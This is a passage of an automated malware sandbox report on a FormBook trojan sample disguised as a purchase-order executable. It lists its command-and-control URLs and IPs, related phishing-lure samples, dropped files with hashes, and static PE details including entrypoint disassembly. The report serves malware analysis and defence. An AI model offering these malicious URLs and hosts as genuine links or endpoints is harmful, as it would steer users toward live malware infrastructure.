                    http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.route4.org/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.dom-2.online/m409/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kalomor.top/1i25/true
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.autonashville.com/7d10/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.easyanalytics.site/21tc/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.subitoadomicilio.shop/x7sd/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.easyanalytics.site/21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.dom-2.online/m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabat.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoat.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://kb.fastpanel.direct/troubleshoot/at.exe, 00000003.00000002.3549391269.000000000591E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000449E000.00000004.00000001.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.comat.exe, 00000003.00000002.3549391269.00000000055FA000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3551318887.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000417A000.00000004.00000001.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchat.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.aapanel.com/new/download.html?invite_code=aapaneleat.exe, 00000003.00000002.3549391269.00000000047D8000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.0000000003358000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.0000000038FF8000.00000004.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssat.exe, 00000003.00000002.3549391269.0000000004C8E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000380E000.00000004.00000001.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.kalomor.topyRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmptrue
                    • 5%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    91.215.85.23
                    		kalomor.topRussian Federation
                    		34665PINDC-ASRUtrue
                    162.0.213.94
                    		www.syvra.xyzCanada
                    		35893ACPCAtrue
                    199.59.243.227
                    		www.dom-2.onlineUnited States
                    		395082BODIS-NJUStrue
                    162.241.226.190
                    		easyanalytics.siteUnited States
                    		46606UNIFIEDLAYER-AS-1UStrue
                    34.150.58.73
                    		www.route4.orgUnited States
                    		2686ATGS-MMD-ASUStrue
                    195.24.68.25
                    		www.subitoadomicilio.shopRussian Federation
                    		48287RU-CENTERRUtrue
                    154.23.184.240
                    		hm62t.topUnited States
                    		174COGENT-174UStrue
                    3.33.130.190
                    		autonashville.comUnited States
                    		8987AMAZONEXPANSIONGBtrue
                    47.104.180.139
                    		www.zhuoyueapp.topChina
                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1515412
                    Start date and time:2024-09-22 17:38:23 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PO #86637.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/2@15/9
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 91%
                    • Number of executed functions: 46
                    • Number of non-executed functions: 306
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    11:40:08API Interceptor7086189x Sleep call for process: at.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    91.215.85.23invoice.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    Purchase order.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/6th3/
                    Remittance advice.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/6th3/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    Quote #011698.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/pf98/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                    • www.kalomor.top/1i25/
                    162.0.213.94New Purchase Order.exeGet hashmaliciousFormBookBrowse
                    • www.kryto.top/09dt/
                    invoice.exeGet hashmaliciousFormBookBrowse
                    • www.syvra.xyz/h2bb/
                    r9856_7.exeGet hashmaliciousFormBookBrowse
                    • www.zimra.xyz/knrh/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.syvra.xyz/h2bb/
                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                    • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                    Scan 00093847.exeGet hashmaliciousFormBookBrowse
                    • www.kryto.top/09dt/
                    Quote #011698.exeGet hashmaliciousFormBookBrowse
                    • www.syvra.xyz/h2bb/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.syvra.xyz/h2bb/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.syvra.xyz/h2bb/
                    0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                    • www.rigintech.info/ig9u/
                    199.59.243.227ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                    • www.care-for-baby-1107.xyz/cxj4/
                    http://kateandkaylearningacademy.comGet hashmaliciousUnknownBrowse
                    • ww1.kateandkaylearningacademy.com/_tr
                    162.241.226.190invoice.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    Quote #011698.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/d029/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/
                    rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/6ra4/
                    factura-630.900.exeGet hashmaliciousFormBookBrowse
                    • www.easyanalytics.site/21tc/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    www.zhuoyueapp.topinvoice.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    Quote #011698.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    factura-630.900.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139
                    PAGO $630.900.exeGet hashmaliciousFormBookBrowse
                    • 47.104.180.139

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    UNIFIEDLAYER-AS-1USurgent inquiry.exeGet hashmaliciousAgentTeslaBrowse
                    • 192.254.225.166
                    PO.pdfGet hashmaliciousUnknownBrowse
                    • 108.179.193.153
                    yMg23n1D5d.elfGet hashmaliciousMirai, MoobotBrowse
                    • 69.195.102.143
                    jydeTkHxMv.elfGet hashmaliciousUnknownBrowse
                    • 162.147.175.182
                    SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                    • 162.241.61.218
                    SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                    • 162.241.61.218
                    https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/nkqy/CVWLS/dG9tLmJ1cmdoYXJ0QHJzbGkuY29t&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccwGet hashmaliciousHTMLPhisherBrowse
                    • 108.167.168.86
                    https://dionthompson.com/a/?ThiNTMtNGYyOS1hNDc1LTA2YWQzNmJkNDc5ZQAQAIGKzFxi43JDqxvx%2BxZRlAU%3DGet hashmaliciousHTMLPhisherBrowse
                    • 192.185.129.84
                    MV ARKADIA Vessel's Details.pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 192.185.222.22
                    GLOBAL ORIOLE.pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                    • 192.185.222.22
                    ACPCANew Purchase Order.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.94
                    invoice.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.94
                    809768765454654.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.72
                    is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                    • 162.55.208.83
                    r9856_7.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.94
                    8097600987765.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.72
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.94
                    QOaboeP8al.exeGet hashmaliciousDarkCloudBrowse
                    • 162.55.60.2
                    Request for Quotataion.exeGet hashmaliciousDarkCloudBrowse
                    • 162.55.60.2
                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                    • 162.0.213.94
                    BODIS-NJUSRECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.227
                    ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.227
                    http://kateandkaylearningacademy.comGet hashmaliciousUnknownBrowse
                    • 199.59.243.227
                    LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    custom_clearance_notification_20240918.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    PO098765678.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    PO76389.exeGet hashmaliciousFormBookBrowse
                    • 199.59.243.226
                    PINDC-ASRUhttps://91.215.85.55Get hashmaliciousUnknownBrowse
                    • 91.215.85.55
                    file.exeGet hashmaliciousPhorpiexBrowse
                    • 194.93.26.70
                    invoice.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    Purchase order.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    Remittance advice.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    Quote #011698.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    PO#86637.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\252778J5Y

                    Download File
                    Process:C:\Windows\SysWOW64\at.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\cunili

                    Download File
                    Process:C:\Users\user\Desktop\PO #86637.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.995360082616683
                    Encrypted:true
                    SSDEEP:6144:blpZPodUGyxrOnRnkvhRoi5n/ozL0cEEuT:bpQa50nevhj5n/oEFhT
                    MD5:BCE92AEE752BB034B32763E3862B589C
                    SHA1:6AA3A87EC2ED3749129ED6ADDC3E63746FA53EAC
                    SHA-256:43929BDAE3D5794838BC9AC34DE31BFF5FE3F5EAE2B641F4890EBA2DB52E0E16
                    SHA-512:BF89699C6924BB897397DAB9C56120E00D5A2C6475A20CD816D067282A414B3D6F516398DB2941874ADB29ED9FAD4463BE8074B9C278B9C72BCF16886B0C5E41
                    Malicious:false
                    Reputation:low
                    Preview:...a.J9TQ...H....l.9V...L[...3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ.TQU9'.K1.?.h.T..lb': i"A!-K5<uTY/+^8.2,.'$'m_!s....#%]1.X:2eE1L6PI9,P@../4.t2T.wY3.O....Q+.J.m)*.U...nS).k=2=.X&.1L6PI9UQ..6O.RHR.-.YTQU78AE1.6RH2TZIM`KSSIR3NJ9T.A78AU1L6 M9UQ.M6_SSIP3NL9TQU78AC1L6PI9UQ9I6OQSIR3NJ;T..78QE1\6PI9EQI]6OSSIR#NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OS}=7K:J9T5.38AU1L6.M9UAIM6OSSIR3NJ9TQu78!E1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSS

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.546512456704791
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:PO #86637.exe
                    File size:1'373'705 bytes
                    MD5:7fe19c52241499f1a94815ca779701d2
                    SHA1:86a466d7ce6653c205f78c7f1d473e35b6d520e6
                    SHA256:3d0f325a9cdb285dcaef0c137211ae8d3cc2d4978c25ecc39efd38677656787c
                    SHA512:5bca92a89c0a28d052e70392118b8153093407effd693e8ee5c5e809d3bade676b463e10b8aaab5e856b694bb9a416ce2232b9145a93bd141d3e2a99a1a52bd9
                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCIJZ2FnbP2BuRh4kt9cOY58Hus83:7JZoQrbTFZY1iaCI8qBcikPY5+us83
                    TLSH:7855F122B5D68036C2B323B19E7FF3A9D63D69360327D19727C82D315EA05416B3A763
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                    File Icon

                    Icon Hash:1733312925935517

                    Static PE Info

                    General

                    Entrypoint:0x4165c1
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                    Entrypoint Preview

                    Instruction
                    call 00007FA908B24E8Bh
                    jmp 00007FA908B1BCFEh
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push edi
                    push esi
                    mov esi, dword ptr [ebp+0Ch]
                    mov ecx, dword ptr [ebp+10h]
                    mov edi, dword ptr [ebp+08h]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007FA908B1BE7Ah
                    cmp edi, eax
                    jc 00007FA908B1C016h
                    cmp ecx, 00000080h
                    jc 00007FA908B1BE8Eh
                    cmp dword ptr [004A9724h], 00000000h
                    je 00007FA908B1BE85h
                    push edi
                    push esi
                    and edi, 0Fh
                    and esi, 0Fh
                    cmp edi, esi
                    pop esi
                    pop edi
                    jne 00007FA908B1BE77h
                    jmp 00007FA908B1C252h
                    test edi, 00000003h
                    jne 00007FA908B1BE86h
                    shr ecx, 02h
                    and edx, 03h
                    cmp ecx, 08h
                    jc 00007FA908B1BE9Bh
                    rep movsd
                    jmp dword ptr [00416740h+edx*4]
                    mov eax, edi
                    mov edx, 00000003h
                    sub ecx, 04h
                    jc 00007FA908B1BE7Eh
                    and eax, 03h
                    add ecx, eax
                    jmp dword ptr [00416654h+eax*4]
                    jmp dword ptr [00416750h+ecx*4]
                    nop
                    jmp dword ptr [004166D4h+ecx*4]
                    nop
                    inc cx
                    add byte ptr [eax-4BFFBE9Ah], dl
                    inc cx
                    add byte ptr [ebx], ah
                    ror dword ptr [edx-75F877FAh], 1
                    inc esi
                    add dword ptr [eax+468A0147h], ecx
                    add al, cl
                    jmp 00007FA90AF94677h
                    add esi, 03h
                    add edi, 03h
                    cmp ecx, 08h
                    jc 00007FA908B1BE3Eh
                    rep movsd
                    jmp dword ptr [00000000h+edx*4]

                    Rich Headers

                    Programming Language:
                    • [ C ] VS2010 SP1 build 40219
                    • [C++] VS2010 SP1 build 40219
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2010 SP1 build 40219
                    • [RES] VS2010 SP1 build 40219
                    • [LNK] VS2010 SP1 build 40219

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
